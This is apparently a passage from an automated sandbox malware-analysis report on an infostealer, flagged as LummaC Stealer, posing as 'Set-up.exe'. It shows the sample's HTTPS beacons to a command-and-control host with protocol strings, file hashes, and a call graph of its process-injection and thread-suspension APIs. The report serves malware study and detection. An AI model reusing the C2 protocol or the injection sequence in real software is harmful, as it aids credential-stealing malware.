                                                                                        2024-10-13 09:42:22 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                        2024-10-13 09:42:22 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                                        Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                                        2024-10-13 09:42:22 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                                        Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                                                                        2024-10-13 09:42:22 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.2.449746104.21.53.84431012C:\Users\user\Desktop\Set-up.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-13 09:42:22 UTC264OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: sergei-esenin.com
                                                                                        2024-10-13 09:42:22 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
                                                                                        2024-10-13 09:42:23 UTC563INHTTP/1.1 200 OK
                                                                                        Date: Sun, 13 Oct 2024 09:42:22 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oSEg6nsrZk6Cc9RXy%2BsI6Zitz7d43ZNXVcUBa0uhrVErdRcnTSCQzh5Mq3Mw8%2Fckb1o%2B%2FzYb9hCl%2F%2FkKvuQxrv9L8V9XqxvVem57TTMqGoTwALsRbbHPaGuHg%2FT6DCg%2FSEstWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d1e6118fbc042aa-EWR
                                                                                        2024-10-13 09:42:23 UTC806INData Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                        Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                        2024-10-13 09:42:23 UTC1369INData Raw: 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65
                                                                                        Data Ascii: -cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getEleme
                                                                                        2024-10-13 09:42:23 UTC1369INData Raw: 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: cess-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain">
                                                                                        2024-10-13 09:42:23 UTC897INData Raw: 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e
                                                                                        Data Ascii: </span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landin
                                                                                        2024-10-13 09:42:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        10192.168.2.449747104.21.53.84431012C:\Users\user\Desktop\Set-up.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-13 09:42:23 UTC354OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cookie: __cf_mw_byp=4G4G655HG37LedGy7IC8mS3vzKXQFLHIQIpWE8gp8rk-1728812542-0.0.1.1-/api
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 82
                                                                                        Host: sergei-esenin.com
                                                                                        2024-10-13 09:42:23 UTC82OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 61 62 6f 62 61 34 35 26 6a 3d 37 63 32 36 33 33 35 37 64 30 34 61 66 66 34 37 33 63 62 32 65 64 61 38 61 34 32 66 66 30 33 33
                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=BVnUqo--@aboba45&j=7c263357d04aff473cb2eda8a42ff033
                                                                                        2024-10-13 09:42:24 UTC825INHTTP/1.1 200 OK
                                                                                        Date: Sun, 13 Oct 2024 09:42:24 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=alga4nuranb6m54ood5o5btgse; expires=Thu, 06 Feb 2025 03:29:03 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z664yIr1vT6nyXVQj7IIzM1PPhFcJp7Q1VuFLHtk1g9h0BvMoXwWvjZr5iFzDOLcZOoHHL3OV%2BLqvXMyjl6MAaYGTJr%2BgwCJj4CPvbEeeTcDVo7ePzRORbQ8z8swvKKQYUxwlg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d1e611efe084291-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-10-13 09:42:24 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                        Data Ascii: aerror #D12
                                                                                        2024-10-13 09:42:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:05:42:01
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Users\user\Desktop\Set-up.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\Set-up.exe"
                                                                                        Imagebase:0xa60000
                                                                                        File size:2'729'072 bytes
                                                                                        MD5 hash:4B923F3600F76EA3FCF20959D94369AC
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:6
                                                                                        Start time:05:42:23
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1012 -s 1600
                                                                                        Imagebase:0x280000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:0.5%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:69.6%
                                                                                          Total number of Nodes:56
                                                                                          Total number of Limit Nodes:7
                                                                                          execution_graph 44998 29d0575 45002 29d0583 44998->45002 44999 29d0a09 45000 29d071b GetPEB 45001 29d0798 45000->45001 45010 29d0c85 45001->45010 45002->44999 45002->45000 45005 29d07f9 CreateThread 45006 29d07d1 45005->45006 45019 29d0b35 GetPEB 45005->45019 45006->44999 45018 29d1185 GetPEB 45006->45018 45008 29d0c85 4 API calls 45008->44999 45009 29d0853 45009->44999 45009->45008 45011 29d0c9b CreateToolhelp32Snapshot 45010->45011 45013 29d07cb 45011->45013 45014 29d0cd2 Thread32First 45011->45014 45013->45005 45013->45006 45014->45013 45015 29d0cf9 45014->45015 45015->45013 45016 29d0d30 Wow64SuspendThread 45015->45016 45017 29d0d5a CloseHandle 45015->45017 45016->45017 45017->45015 45018->45009 45020 29d0b8e 45019->45020 45021 29d0bee CreateThread 45020->45021 45022 29d0c3b 45020->45022 45021->45020 45023 29d1365 45021->45023 45026 2a2452a 45023->45026 45025 29d136a 45027 2a24639 45026->45027 45029 2a2454f 45026->45029 45030 2a25835 45027->45030 45029->45025 45031 2a25858 45030->45031 45032 2a258a3 VirtualAlloc 45031->45032 45038 2a258b6 45031->45038 45033 2a258d0 45032->45033 45032->45038 45035 2a259a4 45033->45035 45033->45038 45040 2a26c17 45033->45040 45035->45038 45039 2a25a5d 45035->45039 45062 2a24abe LoadLibraryA 45035->45062 45038->45029 45039->45038 45044 2a25f73 45039->45044 45041 2a26c2c 45040->45041 45042 2a26ca2 LoadLibraryA 45041->45042 45043 2a26cac 45041->45043 45042->45043 45043->45033 45045 2a25faf 45044->45045 45046 2a2601c NtCreateSection 45045->45046 45047 2a26041 45045->45047 45061 2a2660e 45045->45061 45046->45047 45046->45061 45048 2a260da NtMapViewOfSection 45047->45048 45047->45061 45056 2a260fa 45048->45056 45049 2a2641e VirtualAlloc 45057 2a2645e 45049->45057 45050 2a26c17 LoadLibraryA 45050->45056 45051 2a26c17 LoadLibraryA 45053 2a2636c 45051->45053 45052 2a2650d VirtualProtect 45054 2a265dd VirtualProtect 45052->45054 45058 2a26532 45052->45058 45053->45049 45053->45051 45055 2a2641a 45053->45055 45054->45061 45055->45049 45056->45050 45056->45053 45056->45061 45057->45052 45059 2a264fa NtMapViewOfSection 45057->45059 45057->45061 45058->45054 45060 2a265b4 VirtualProtect 45058->45060 45059->45052 45059->45061 45060->45058 45061->45038 45062->45039
                                                                                          APIs
                                                                                          • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 02A26033
                                                                                          • NtMapViewOfSection.NTDLL(?,00000000), ref: 02A260DF
                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?), ref: 02A2644A
                                                                                          • NtMapViewOfSection.NTDLL(?,00000000), ref: 02A264FF
                                                                                          • VirtualProtect.KERNELBASE(?,?,00000008,?), ref: 02A2651C
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,00000000), ref: 02A265C1
                                                                                          • VirtualProtect.KERNELBASE(?,?,00000002,00000000), ref: 02A265F6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Virtual$ProtectSection$View$AllocCreate
                                                                                          • String ID:
                                                                                          • API String ID: 2664363762-0
                                                                                          • Opcode ID: 0b64ae62a9707750b83c9f98bbf6d7199bee7893939f3559e4f57fa99803780f
                                                                                          • Instruction ID: cbfdc6c6eeae33d299409f46fbed0e68d13ae7b9371699ffa659e7dc0f3e0332
                                                                                          • Opcode Fuzzy Hash: 0b64ae62a9707750b83c9f98bbf6d7199bee7893939f3559e4f57fa99803780f
                                                                                          • Instruction Fuzzy Hash: 45428C71605321AFDB24CF68CC84B6AB7E9FF88B14F04482DF9859B241EB70E948CB51

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 193 29d0c85-29d0ccc CreateToolhelp32Snapshot 196 29d0da2-29d0da5 193->196 197 29d0cd2-29d0cf3 Thread32First 193->197 198 29d0d8e-29d0d9d 197->198 199 29d0cf9-29d0cff 197->199 198->196 200 29d0d6e-29d0d88 199->200 201 29d0d01-29d0d07 199->201 200->198 200->199 201->200 202 29d0d09-29d0d28 201->202 202->200 205 29d0d2a-29d0d2e 202->205 206 29d0d46-29d0d55 205->206 207 29d0d30-29d0d44 Wow64SuspendThread 205->207 208 29d0d5a-29d0d6c CloseHandle 206->208 207->208 208->200
                                                                                          APIs
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,029D07CB,?,00000001,?,81EC8B55,000000FF), ref: 029D0CC3
                                                                                          • Thread32First.KERNEL32(00000000,0000001C), ref: 029D0CEF
                                                                                          • Wow64SuspendThread.KERNEL32(00000000), ref: 029D0D42
                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 029D0D6C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                          • String ID:
                                                                                          • API String ID: 1849706056-0
                                                                                          • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                          • Instruction ID: db279f418049d8a1ed46ce6f2b3b06a9d8adbefd4c24913d380844ad607320db
                                                                                          • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                          • Instruction Fuzzy Hash: 84410C75A00208AFDB18DF98C490BADB7FAEF88340F10C169E6159B7A4DB35AE45CB54

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 209 29d0b35-29d0b8c GetPEB 210 29d0b97-29d0b9b 209->210 211 29d0c3b-29d0c42 210->211 212 29d0ba1-29d0bac 210->212 213 29d0c4d-29d0c51 211->213 214 29d0c36 212->214 215 29d0bb2-29d0bc9 212->215 217 29d0c53-29d0c60 213->217 218 29d0c62-29d0c69 213->218 214->210 219 29d0bee-29d0c06 CreateThread 215->219 220 29d0bcb-29d0bec 215->220 217->213 222 29d0c6b-29d0c6d 218->222 223 29d0c72-29d0c77 218->223 224 29d0c0a-29d0c12 219->224 220->224 222->223 224->214 226 29d0c14-29d0c31 224->226 226->214
                                                                                          APIs
                                                                                          • CreateThread.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000), ref: 029D0C01
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateThread
                                                                                          • String ID: ,
                                                                                          • API String ID: 2422867632-3772416878
                                                                                          • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                          • Instruction ID: cdf2add27f6d091b884f95a61a592c4f7ed030ace805a0a661b371f02973162a
                                                                                          • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                          • Instruction Fuzzy Hash: BD41E274A00209EFDB14CF98C994BAEBBB1FF88314F208598D515AB380D775AE85DF94

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 245 29d0575-29d06dd call 29d0b25 call 29d1125 call 29d12d5 call 29d0ec5 254 29d0b0e-29d0b11 245->254 255 29d06e3-29d06ea 245->255 256 29d06f5-29d06f9 255->256 257 29d071b-29d0796 GetPEB 256->257 258 29d06fb-29d0719 call 29d1045 256->258 259 29d07a1-29d07a5 257->259 258->256 262 29d07bd-29d07cf call 29d0c85 259->262 263 29d07a7-29d07bb 259->263 268 29d07f9-29d081a CreateThread 262->268 269 29d07d1-29d07f7 262->269 263->259 270 29d081d-29d0821 268->270 269->270 272 29d0827-29d085a call 29d1185 270->272 273 29d0ae2-29d0b05 270->273 272->273 277 29d0860-29d08af 272->277 273->254 279 29d08ba-29d08c0 277->279 280 29d0908-29d090c 279->280 281 29d08c2-29d08c8 279->281 284 29d09da-29d0acd call 29d0c85 call 29d0b25 call 29d1125 280->284 285 29d0912-29d091f 280->285 282 29d08db-29d08df 281->282 283 29d08ca-29d08d9 281->283 286 29d0906 282->286 287 29d08e1-29d08ef 282->287 283->282 311 29d0acf 284->311 312 29d0ad2-29d0adc 284->312 288 29d092a-29d0930 285->288 286->279 287->286 291 29d08f1-29d0903 287->291 289 29d0960-29d0963 288->289 290 29d0932-29d0940 288->290 297 29d0966-29d096d 289->297 295 29d095e 290->295 296 29d0942-29d0951 290->296 291->286 295->288 296->295 299 29d0953-29d095c 296->299 297->284 301 29d096f-29d0978 297->301 299->289 301->284 303 29d097a-29d098a 301->303 305 29d0995-29d09a1 303->305 307 29d09a3-29d09d0 305->307 308 29d09d2-29d09d8 305->308 307->305 308->297 311->312 312->273
                                                                                          APIs
                                                                                          • CreateThread.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 029D0818
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 2422867632-0
                                                                                          • Opcode ID: 199eae8584c575ccc8a049b37c905b29b8712e32bfa96fb22a8bbc98336ddc65
                                                                                          • Instruction ID: b10a61370afe913d0e20b667ef5b73b9f9af5b70ace861d8c7499ee6b42477d7
                                                                                          • Opcode Fuzzy Hash: 199eae8584c575ccc8a049b37c905b29b8712e32bfa96fb22a8bbc98336ddc65
                                                                                          • Instruction Fuzzy Hash: B512B0B1E00219DFDB14CF98C990BADBBB2FF88304F2482A9D519AB385D7356A41DF54

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 228 2a26c17-2a26c2a 229 2a26c42-2a26c4c 228->229 230 2a26c2c-2a26c2f 228->230 232 2a26c5b-2a26c67 229->232 233 2a26c4e-2a26c56 229->233 231 2a26c31-2a26c34 230->231 231->229 234 2a26c36-2a26c40 231->234 235 2a26c6a-2a26c6f 232->235 233->232 234->229 234->231 236 2a26ca2-2a26ca9 LoadLibraryA 235->236 237 2a26c71-2a26c7c 235->237 240 2a26cac-2a26cb0 236->240 238 2a26c98-2a26c9c 237->238 239 2a26c7e-2a26c96 call 2a2733b 237->239 238->235 242 2a26c9e-2a26ca0 238->242 239->238 244 2a26cb1-2a26cb3 239->244 242->236 242->240 244->240
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNELBASE(00000000,?,?), ref: 02A26CA9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
